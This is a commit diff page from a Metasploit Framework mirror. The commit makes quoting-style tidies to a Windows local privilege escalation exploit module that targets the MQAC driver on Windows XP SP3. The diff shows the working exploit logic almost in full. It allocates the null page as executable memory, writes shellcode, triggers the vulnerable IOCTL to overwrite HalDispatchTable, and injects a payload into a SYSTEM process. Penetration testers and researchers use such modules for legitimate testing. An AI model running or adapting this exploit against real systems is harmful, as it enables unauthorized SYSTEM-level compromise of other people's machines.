infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor tidies to conform to standards

bug/bundler_fix
OJ 2014-07-25 09:32:54 +10:00 committed by Joshua Smith
parent 31c51eeb63
commit 2b021e647d
1 changed files with 23 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

46
modules/exploits/windows/local/mqac_write.rb
View File

@ -61,10 +61,10 @@ class Metasploit3 < Msf::Exploit::Local
def find_sys_base(drvname)
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
@ -82,24 +82,24 @@ class Metasploit3 < Msf::Exploit::Local
# Function borrowed from smart_hashdump
def get_system_proc
# Make sure you got the correct SYSTEM Account Name no matter the OS Language
local_sys = resolve_sid("S-1-5-18")
local_sys = resolve_sid('S-1-5-18')
system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
this_pid = session.sys.process.getpid
# Processes that can Blue Screen a host if migrated in to
dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']
session.sys.process.processes.each do |p|
# Check we are not migrating to a process that can BSOD the host
next if dangerous_processes.include?(p["name"])
next if p["pid"] == this_pid
next if p["pid"] == 4
next if p["user"] != system_account_name
next if dangerous_processes.include?(p['name'])
next if p['pid'] == this_pid
next if p['pid'] == 4
next if p['user'] != system_account_name
return p
end
end
def open_device
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
if handle['return'] == 0
print_error('Failed to open the \\\\.\\MQAC device')
return nil
@ -110,17 +110,17 @@ class Metasploit3 < Msf::Exploit::Local
def check
handle = open_device
if handle.nil? || handle == INVALID_HANDLE_VALUE
print_error("MSMQ installation not found")
print_error('MSMQ installation not found')
return Exploit::CheckCode::Safe
end
session.railgun.kernel32.CloseHandle(handle)
os = sysinfo["OS"]
os = sysinfo['OS']
case os
when /windows xp.*service pack 3/i
return Exploit::CheckCode::Appears
when /windows xp/i
print_error("Incorrect version of Windows XP detected")
print_error('Unsupported version of Windows XP detected')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
@ -128,16 +128,16 @@ class Metasploit3 < Msf::Exploit::Local
end
def exploit
if sysinfo["Architecture"] =~ /wow64/i
print_error("Running against WOW64 is not supported")
if sysinfo['Architecture'] =~ /wow64/i
print_error('Running against WOW64 is not supported')
return
elsif sysinfo["Architecture"] =~ /x64/
print_error("Running against 64-bit systems is not supported")
elsif sysinfo['Architecture'] =~ /x64/
print_error('Running against 64-bit systems is not supported')
return
end
if is_system?
print_error("This meterpreter session is already running as SYSTEM")
print_error('This meterpreter session is already running as SYSTEM')
return
end
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Local
this_proc = session.sys.process.open
unless this_proc.memory.writable?(base_addr)
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
end
unless this_proc.memory.writable?(base_addr)
print_error('Failed to properly allocate memory')
@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Local
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
hKernel = hKernel['return']
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable = halDispatchTable['return']
halDispatchTable -= hKernel
halDispatchTable += kernel_info[0]
@ -192,19 +192,19 @@ class Metasploit3 < Msf::Exploit::Local
this_proc.memory.write(0x1, shellcode)
this_proc.close
print_status("Triggering vulnerable IOCTL")
print_status('Triggering vulnerable IOCTL')
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
unless is_system?
print_error("Exploit failed")
print_error('Exploit failed')
return
end
proc = get_system_proc
print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
unless execute_shellcode(payload.encoded, nil, proc['pid'])
fail_with(Failure::Unknown, "Error while executing the payload")
fail_with(Failure::Unknown, 'Error while executing the payload')
end
end